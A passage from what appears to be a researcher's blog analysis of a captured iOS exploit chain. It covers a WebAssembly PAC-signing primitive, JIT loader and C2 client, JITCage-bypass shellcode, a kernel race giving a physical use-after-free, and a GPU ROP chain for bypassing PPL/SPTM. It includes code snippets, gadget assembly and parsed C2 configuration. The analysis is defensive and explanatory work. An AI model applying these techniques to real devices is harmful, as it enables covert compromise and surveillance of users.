local.get 2
local.get 3
local.get 4
local.get 5
local.get 6
local.get 7
local.get 8
local.get 9
local.get 10
local.get 11
local.get 12
local.get 13
local.get 14
local.get 15
call 2
local.set 16
i32.const 0
local.get 16
i32.wrap_i64
i32.store
i32.const 4
local.get 16
i64.const 32
i64.shr_u
i32.wrap_i64
i32.store
return)
(table (;0;) 2 funcref)
(memory (;0;) 1 1)
(export "t" (table 0))
(export "m" (memory 0))
(export "o" (func 0))
(export "f" (func 3))
(elem (;0;) (i32.const 0) func 0))
The name of this class leaked in an error message (
After the signer and caller have been exported to the main module, they then call a function to validate signing. This basically validates that signing a PAC-stripped wasm function pointer is returning the same result as the original one.
Once the exploit achieved a PAC signing and function calling primitive, the main module will load a MachO JIT loading module that is responsible for fetching the LPE stage. There are two different potential loaders, but for this capture
Similar to the seedbell generic helper module, this module features a class for the dyld shared cache and a MachO class, which the former uses to load all of the dylibs in the cache into it, as well as helper classes that are used for handling the MachO and its symbols.
Oddly, while having similarities to the seedbell helper, it looks like a complete reimplementation (or rather seedbell's helper is one, because it was shipped later) using its own number helper class as well as using a function to parse a MachO instead of having that embedded into the MachO class. I really don't understand the design decision behind this and thereby assume that it happened because the codebase has evolved and eventually the PAC bypass required a dyld shared cache parser of its own.
As the first step the orchestrator will call a function in this module that recreates the
Afterwards the orchestrator will create the JIT loader class. During construction this class will select a viable loading strategy based on the available code in JSC. It will check if:
If it doesn't find
Then the C2C JS client is created. They will basically launch a new thread from inside the MachO later and then return to JS code execution. This way they can then maintain a communication channel to JS via a backend buffer allowing them to do networking via JS (for example to fetch new payloads or send off data back to the server). The C2C client has eight states:
The framework again validates that it isn't running on macOS, presumably because the LPE exploitation only supports iOS.
They then instantiate a new class that is responsible for loading the MachO stage. This will initially link the shellcode with default values and decompress a base64 encoded MachO. It will also write the resource url, a ChaCha20 key, the logging url (which is empty for this deployment) and the user agent into different buffers, so that the MachO can access them. Filling everything with default values allows them to do an accurate calculation of the size needed for the code cave. Based on the available methods the JIT loading module will either just create the cave via
struct config
{
uint64_t load_2_addr;
uint64_t macho_load_addr;
uint64_t is_zero;
uint64_t code_addr;
uint64_t macho_23_len;
uint64_t resource_url_addr;
uint64_t ChaCha20_key_addr;
uint64_t document_url_addr;
uint64_t data_to_load_addr;
uint64_t useragent_addr;
uint64_t logging_url_addr;
uint64_t signed_pacia1716_gadget;
uint64_t signed_pacib1716_gadget;
uint64_t signed_pacda_gadget;
uint64_t signed_pacdb_gadget;
uint64_t signed_braa_x10_gadget;
uint64_t mov_x2_x11_braa_x14_gadget_paciza;
uint64_t jit_op_mov_x13_4911_brab_x2_x13;
uint64_t braa_x14_pac_ctx;
uint64_t dlsym_addr;
uint64_t unk;
uint64_t in_private_browsing_mode;
uint64_t should_do_logging;
};
So with this the shellcode also has access to multiple signing and branch gadgets.
Finally, it uses the JIT loading module to load this code via a call to
The purpose of the shellcode is to load the MachO into memory and then optionally jump to it. It's quite large because it has to feature a full MachO parser & loader and code patterns to defeat the JITCage. This is also what I'll be mainly focusing on in this section, so if you aren't interested in JITCage bypasses you can skip to the next one.
Public documentation on the JITCage is limited; I was only able to find this presentation by Synacktiv and a talk by Luca on it. The JITCage was introduced as a hardware feature on A15. Generally, Apple's high-level idea seems to be that they want to control what an attacker can execute in JIT code. Regular JIT code doesn't need to perform any syscalls, for example, so they will fault on
To me it looks like the shellcode was compiled with a custom compiler to be compatible with running inside of this environment, while also staying compatible with running on older CPUs that don't support PAC and CPUs without the JITCage. In order to maintain compatibility with older CPUs the shellcode abuses the fact that the
MOV X30, #0xAAAAAAAAAAAAAAAA
XPACLRI
MOV X0, #0xAAAAAAAAAAAAAAAA
CMP X0, X30
CSET X0, NE
If the CPU supports PAC
MOV X10, X30
MOV X30, #0xAAAAAAAAAAAAAAAA
XPACLRI
MOV X11, #0xAAAAAAAAAAAAAAAA
CMP X11, X30
MOV X30, X10
B.NE +0x8
RET
MOV X10, X30
BLR X10
So on non-PAC devices the code will just execute a
MOV X11, X30
MOV X30, X10
XPACLRI
MOV X10, X30
MOV X30, X11
BR X10
Otherwise it has to go via an indirection. Remember that there is no way for an attacker to generate new JIT exit points because the keys to sign a valid function pointer have been locked away, so they need to use an existing one and get a call primitive from there. For this they use the JIT operation function
global _vmEntryHostFunction
_vmEntryHostFunction:
jmp a2, HostFunctionPtrTag
translating to the following asm:
_vmEntryHostFunction
MOV X13, #0x4911
BRAB X2, X13
So this is a function they can jump to from JIT code and by setting
From a high-level perspective, the shellcode will then execute the following:
The shellcode uses two interesting strategies to find the addresses of
The embedded MachO will now set up intercom functions for communication with the C2C JS client, implement functions for parsing the configuration files from the C2C server and acting upon them, detect CPU features and iOS version (this will also detect "unsafe" environments like Corellium), and detect a relaxed sandbox as well as code execution inside iTunes Store (instead of Safari). The main function will then do another environment check for Corellium, a valid CPU and
When the thread starts, it downloads a configuration file from the server. For this capture, that was
python3 parse_config.py ../processed_files/28_7a7d99099b035b2c6512b6ebeeea6df1ede70fbb_decompressed
elem: 0x70000 0x3 @ +0x18 (0x878)
0xf2300000 6c682a65deb7cf020dd640d130a2a73e9442ccddc441520c951620a4142605ad b'4800048658463f971e752ff93c1767e9ae7f3431.min.js'
0xf3300000 230ddaa380a7899e52be22cc926a4b7609303e14c3ed55d59049d3b20ee12974 b'b442ab113b829ff8c7bf34afa4d2d997889f308f.min.js'
0xf2400000 176f3b0d80c6c94f5bcc3e638185d1a4a057a859141b569f877468cc7bd7c149 b'5258f6e3eef3eda249179aa1122b50b03cbeea18.min.js'
0xf3400000 e6542d26109c5c3aa4f33c9ee07d69dc58ef66e81a7c20c2447cff7fe9f45a0c b'a78a94196b5d2c95865f6a8423a6b8eb86d07c6c.min.js'
0xf2700000 50a323f335f2bf4634b8f13526dc46f73d6ae15d4960d1f72e601aa4e733a7ec b'38af3c8ba461079a0edc83585023f76843066dcf.min.js'
0xf3700000 cab13d34917b6f5bdcfc69d7c668021b735a4d82b05b0918b9e228dc1860988e b'1334417664270db20af705f422878c53c8378203.min.js'
0xf2800000 6662406a17f3a38fdbbf9938d3c4c07b649ad22cf6d6f4c00bc9db96910b3817 b'226cbd845c5f470075505392be8693ec6d4f5ba3.min.js'
0xf3800000 fdd8b3940d2a06b0229d814e874095fd1fa87cb53db4699ba9dd8dd7370cf8cc b'ae7efd66ecde9e964cfe92f64e9b6461fce38f28.min.js'
0xf2900000 8360789e772f55126e9114dc7965d3162d6b7a781ddfa69be0971c66f04e6045 b'7a1cef00016b950be42f5288ead21fa6fccc3107.min.js'
0xf3900000 388976a2cdce966476ddc0f79249081ec182efc26808beb2e2e456f8c4809535 b'377bed7460f7538f96bbad7bdc2b8294bdc54599.min.js'
0xf3730000 3cb781d9c1ade5c3b54606839baa51f5c5751f73f0cd055fc101e41d467403d7 b'c8a14d79a27953242d60243ee2f505a85d9232cc.min.js'
0xf3830000 bdff99612a2aa99aef5cd7845d7f0b06a77c36d4f674fab7939799a39b8f78b1 b'1b2cbbde08f8b2330b7400abcb97c9573973e942.min.js'
0xf2750000 58199343c3811b01adda525bc08fcf135c6369fb3bdc3d52ca2374491e789f48 b'e9f898587620186e31119fbf32660f26c1e048e0.min.js'
0xf3750000 a6244c09c0588cf126ad727f75a647132543239c8b8fff5d362d56b616752327 b'f4120dc6717a489435d86943472c5a2444aac8e6.min.js'
0xa2050000 7da5f7d73e652aa782c89a883c27d0898affddf5d13b5914423a66a15ad3b319 b'f8a86cf368fdbbe294813926a2a229df041eb758.min.js'
0xa3050000 c02c657bb22d6cfc6aed70143f1fc8fbd44f33dbe6e12979d10c7891dcfc25c7 b'72a5ac816709f9c331f2b3afb76cd3d96517ea14.min.js'
0xa3060000 338bf220589af21d44e4dda167fab47c99040da951c40406ff99b5c4cc48735e b'980c77f1747afa9ac1fa5f8fbfb9e6663e9f82bb.min.js'
0xa3030000 be7efb67c5b39656f00f03b5a06593bf41bd760e5280a887f0a701226f39c3c8 b'5e89f83ec50c6223d664d3f3260ef874a3d6d796.min.js'
0xa3040000 a19b901b47f9dd7b86ca75fa1d25bd4404e9cdd2e2bf56722149fc213434f00e b'2a1d692b7b5ba793527b2c14b48db21a3e5d2c5f.min.js'
Basically this configuration file contains one element of type
elem: 0x80000 0x3 @ +0x78 (0x37e40)
elem: 0x90000 0x3 @ +0x37eb8 (0x516d0)
elem: 0xf0000 0x3 @ +0x89588 (0x2eb40)
elem: 0x70005 0x3 @ +0xb80c8 (0x2c)
elem: 0x50000 0x3 @ +0xb80f4 (0x610c)
elem: 0x90001 0x3 @ +0xbe200 (0x50a40)
elem: 0x70000 0x3 @ +0x10ec40 (0x1d4)
0x2900000 85ab5908ceb1981df3449b52155a5026561c51d6f9f599acc99c5203b14733eb b'4612aa650e60e2974a9ec37bbf922c79635b493a.min.js'
0xe2900000 b252669de4b4adc34114fdf10d75f66b3efad6280f4fcd19603f6fac5873ede2 b'4817ea8063eb4480e915f1a4479c62ec774f52ce.min.js'
The new config (0x70000) contains entries for the PE, of which the kit will later download (0xe2900000). 0x70005 is the process name the PE should get injected to (
The code will then update the configuration with the following ids:
Afterwards the new config (0x70000) is returned. If
Due to time constraints, I also only had a high-level look at this MachO. It seems to be the PE orchestrator, loading the main PE MachO (0x90000), calling
The 0x90000 MachO is the main PE stage. In it are both
Gruber is a race condition between a
Because this was super hard to figure out, I think it's easiest to take you along for the ride instead of just describing the bug right away. I'll skip over a lot of setup to keep this part a bit shorter, we will talk about this more in-depth in the exploitation section.
Initially the exploit will find a submap (vm
vm_address_t addr = 0;
// ...
ret = vm_map(mach_task_self(),
&addr,
size,
0,
VM_FLAGS_FIXED,
memory_entry_port,
0x0,
true,
VM_PROT_READ,
VM_PROT_READ,
VM_INHERIT_DEFAULT);
As you can see, because
mach_make_memory_entry_64(mach_task_self(),
&size,
0x0,
VM_PROT_READ,
&new_port,
memory_entry_port);
Then the ref count of the
The only other good information that is easily obtainable is that in 17.3 when the bug was patched, Apple now takes a lock on the parent entry in
The main issue that remains is that the
In the past I've used Corellium's HyperTrace feature to get kernel execution traces. "Luckily" the feature was broken on my Corellium/model/version combination, which led me to try out CoreXight instead. This is an even lower level feature based on CoreSight, which allows full vm tracing including usermode, which proved very useful for this, because it allowed me to align the two traces on the
To initiate a trace you need to connect to the Charm console and issue a
$ rlwrap socat - /run/charmd
armtrace name:<vm name> stream:/tmp/capture.bin filter:"clear: name:<process name>" el1:1
This will then trace the vm
The trace is saved in a custom format, but Corellium provides a tool (
corexight /tmp/capture.bin -strace /usr/share/corellium/strace/ios-arm64.csmf -global macho:/tmp/kc@0xfffffff029d04000
The first argument is the trace file, followed by the syscall definition to allow resolving of those and then the MachO of the kernel. Using
A trace then looks like this:
5 1430 gruber 51072 > 0x00000001df14c1d4 mach_msg2 ( msg: 0x16d60ae38 -> { msgh_bits: 0x80001513, msgh_size: 100, msgh_remote_port: 515, msgh_local_port: 0x117b7, msgh_voucher_port: 0, msgh_id: 4811, msg: [ 0x01 0x00 0x00 0x00 0x6b 0x38 0x01 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x13 0x00 0x00 0x00 0x00 0x00 0x01 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x80 0x04 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x01 0x00 0x00 0x00 0x01 0x00 0x00 0x00 0x01 0x00 0x00 0x00 0x01 0x00 0x00 0x00 ... ] }, option: 0x200000003 (MACH_RCV_MSG|MACH_SEND_MSG|0x200000000), msgh_bits: 0x80001513, send_size: 100, msgh_remote_port: 515, msgh_local_port: 0x117b7, msgh_voucher_port: 0, msgh_id: 4811, rcv_msgh_bits: 1, rcv_name: 0x117b7, rcv_size: 52, notify: 0, timeout: 0 ) ... @[ 00000001df14bf70 00000001df154bd4 00000001df154ac0 0000000102ab0c40 000000020175b4d4 000000020175aa10 ]
5 1430 gruber 51072 0xfffffff02aacb474-0xfffffff02aacb477
5 1430 gruber 51072 0xfffffff02aacb478-0xfffffff02aacb4bb
5 1430 gruber 51072 0xfffffff02aacc560-0xfffffff02aacc563
I already prefiltered the trace using this grep chain
My final traces had one small difference in the beginning (likely something during syscall entry) but then they heavily diverged later on and seeking to the address right before the divergence brought me right to the root cause. 30 min of dynamic analysis beating 50+h of static analysis, so I can only recommend this approach if you have the possibility to do it.
So thanks to dynamic analysis with the traces, we know that the flow diverges in a function called
The high-level preparation steps are preparing the physical pages free pool for the pUAF and preparing the mappings and mach ports in order to be able to spray
In order to guarantee correctly triggering the bug, they initially created enough memory entry ports (equal to the racer thread count) to reference the
Their next step is to reallocate the pUAF'd memory with kernel objects. For this in the next step they want to have a clean physical page free list or rather know when the kernel will start to consume their pages. So they will allocate memory and place a marker on it, then observe the pUAF mapping to see if the marker appears and continue that in a loop till it does.
They trigger the bug twice: once using
They only reject on the first condition, because they can't guarantee that their
For
For the early read they will receive the mach messages that hold the OOL descriptors until they observe the address inside of the observed
In addition they also remove the entry from the R&B tree by setting
Then they call
if (!vm_map_lookup_entry(map, start, &tmp_entry)) {
if ((entry = tmp_entry->vme_next) == vm_map_to_entry(map)) {
vm_map_unlock_read(map);
return KERN_INVALID_ADDRESS;
}
} else {
entry = tmp_entry;
}
So if the lookup fails (and thereby returns the last entry it saw) it will take
start = entry->vme_start;
basic->offset = VME_OFFSET(entry);
basic->protection = entry->protection;
basic->inheritance = entry->inheritance;
basic->max_protection = entry->max_protection;
basic->behavior = entry->behavior;
basic->user_wired_count = entry->user_wired_count;
basic->reserved = entry->is_sub_map;
*address_u = vm_sanitize_wrap_addr(start);
*size_u = vm_sanitize_wrap_size(entry->vme_end - start);
After the read they restore the original values.
For the physical mapping primitive they will use the first
They can read
They implement 5 different write strategies:
Instead of using the mapping primitive they initially set up with the offset they instead have to modify kernel structures for this one (again I really don't understand why they duplicate primitives here). For this they need a 64-bit kernel write. For this one they will first steal the IOGPU port from SpringBoard during setup and then use it to create an IOGPU object. Then they use their original mapping primitive to map this object and use
For the kernel read they have several strategies:
Initially, I didn't understand why they even need these read functions when they could instead use the mapping primitive to map the data into usermode and then read it from there, but Alfie correctly pointed out that in order to read PPL/SPTM-protected mappings, they can't map them (as that would lead to a kernel panic), so it makes sense why they have to provide these primitives here.
Depending on version (and I assume sandbox) a working primitive is selected.
As the final step before they can load their implant, they need to bypass PPL (on modern phones, SPTM). For this, they gain GFX (GPU) code execution, defeat that coprocessor's μPPL implementation, and then use full GFX physical memory access to create a self-referencing page table entry (PTE) on the AP, which they can use to bypass PPL/SPTM when writing to protected memory.
The GFX is the GPU coprocessor on Apple Silicon. It runs its own firmware (a variant of RTKit) and communication from the AP is done via two kernel drivers:
In iOS 17.4, there is one change I associate with a patch for Rocket: GFX's
The function that sets up the self-referencing PTE entry will initially do a lot of offset finding on
For this they use yet another primitive: the ability to kalloc memory that they don't own, but that is owned by the kernel. Depending on the XNU version they will either grow the
With the mappings prepared they will then set up a ROP chain that is meant to be executed on the GFX. Depending on the SoC they execute one of three ROP chains. From a high-level PoV, all the ROP chains revolve around entering hibernation with a controlled hibernation state so that on wake-up thanks to the state control they will regain code execution and also run with fully controlled page tables. Generally speaking, their ROP chain will: restore the entry point (to avoid executing the ROP chain again), set up hibernation data structures in a way where they will regain code execution with controlled page tables, return back to regular execution and wait for hibernation or trigger it themselves. Then once they wake up from hibernation and regained code execution with the fake page tables they will set up the self-referencing PTE on the AP and then gracefully exit ROP to continue regular execution.
To kick off the chain they will insert a job into the GFX job list which only contains a single GPU fence/stamp operation. This gives them a 32-bit write primitive on the GFX. With this 32-bit write they overwrite the thread state pointer of the power thread to point to their own (they overwrite byte 1-5 to allow full control of the pointer with 32 bits except for the bottom byte and then align their fake object to the same bottom byte as the original pointer). This allows them to gain code execution in the context of the power thread once it gets scheduled again. When they have a stolen port they can easily submit a job to the GFX using an external method (and some patching of data structures to insert that malformed fence operation) while without it they will use the physical mapping primitive to map the job list and directly insert the job into it.
The GFX ROP chains are based on this gadget:
ADD X1, X1, #0x210
STP X4, X5, [X1]
STR W6, [X1,#0x10]
BL __rtk_arch_fast_interrupt
ADD X1, SP, #0x350+var_240
LDP X2, X3, [X1,#-0x10]
LDR X4, [X1],#8
MSR CPACR_EL1, X4
LDP X5, X6, [X1]
MSR FPSR, X5
MSR FPCR, X6
LDP Q0, Q1, [X1,#0x10]
// [...] loading Q2-Q29
LDP Q30, Q31, [X1,#0x1F0]
ADD X1, X1, #0x210
LDP X5, X6, [X1]
LDR W7, [X1,#0x10]
MSR ELR_EL1, X2
MSR SPSR_EL1, X3
MSR FAR_EL1, X5
MSR PAR_EL1, X6
MSR ESR_EL1, X7
LDP X6, X7, [SP,#0x350+var_320]
LDP X8, X9, [SP,#0x350+var_310]
LDP X10, X11, [SP,#0x350+var_300]
LDP X12, X13, [SP,#0x350+var_2F0]
LDP X14, X15, [SP,#0x350+var_2E0]
LDP X16, X17, [SP,#0x350+var_2D0]
LDR X18, [SP,#0x350+var_2C0]
LDP X29, X30, [SP,#0x350+var_268]
LDP X0, X1, [SP,#0x350+var_350]
LDP X2, X3, [SP,#0x350+var_340]
LDP X4, X5, [SP,#0x350+var_330]
ADD SP, SP, #0x350
ERET
It allows them to load all registers and perform a double jump by setting
For modifying memory they use a
There are three different versions of the ROP chain.
For A13 prior to execution they will modify (using AP physical R/W)
On A14-A17 they will:
Thanks to a tweet from Plx we now know that
Additionally, on A14 they perform a second PTE store before restoring state to unmap the second GFX MMIO region (0xfffffc1100170000) by replacing it with a regular mapping. I don't fully know why they need to do this on A14 only, but I suspect they want the AP to not read certain values from that region and then potentially panic.
I suspect that the reason they can't do the A13 attack on A14+ is stronger CTRR no longer allowing them to modify
With this they now have full physical R/W and can load the implant. I assume this is done inside of the
This section contains all the open questions I have after my analysis so far. I will likely come back to answer them in a while and then update this post.
Pointer Authentication Codes (PAC) is a security feature implemented in ARMv8.3 and later architectures that provides Control-Flow Integrity (CFI) against both the forward edge (prevents JOP) and backward edge (ROP). PAC works by adding a cryptographic signature to pointers, which can be used to verify the integrity of the pointer before it is dereferenced. This helps to prevent attackers from manipulating pointers to execute arbitrary code or access unauthorized memory. Apple shipped PAC on A12 and later devices, so on these devices attackers need a PAC bypass before they can achieve code execution. There is a blog post by Brandon Azad, who analysed the initial implementation and a lot more talks about bypasses on the web.
The JITBox/JITCage is a security feature inside of WebContent that tries to prevent attackers from using the JIT region as a way to defeat CFI. There is very little public documentation on it, but I've found this presentation by Synacktiv and a talk by Luca on it. Apple basically limits what assembly instructions can execute inside of the JIT region and where the code can jump to (by disallowing unauthenticated jumps and jumps outside of the region and for authenticated jumps restricting access to the signing keys).
The Page Protection Layer (PPL) on older and Secure Page Table Monitor (SPTM) on newer devices is responsible for protecting the system against an attacker who already has kernel R/W. It does so by obtaining control over the page tables as well as other important data structures and keeping them read-only from the kernel so that they can't be modified without getting a write primitive inside of the PPL/SPTM context first. Good blog posts about them can be found here, here and here.
The term pUAF was first coined by felix-pb in his kfd writeup. Contrary to a regular UAF, where the virtual address gets reused, a physical UAF (pUAF) describes a scenario where, due to a bug inside the vm subsystem, the physical pages backing a mapping get freed while the (virtual) mapping still exists. This means that the virtual address of the mapping can still be used to access the memory, but it will now point to whatever new data got allocated on those physical pages. This is a very powerful primitive as it allows an attacker to then simply spray kernel structures they wish to modify, detect them appearing on their pUAF'd mapping and then modify them straight from usermode.
I hope you've enjoyed the read. Thanks to everyone who helped me with this, in capture, analysis, understanding and proof reading!
If you have any questions or suggestions for improvement you can reach out to me on Twitter or via E-Mail.
Till next time ~lailo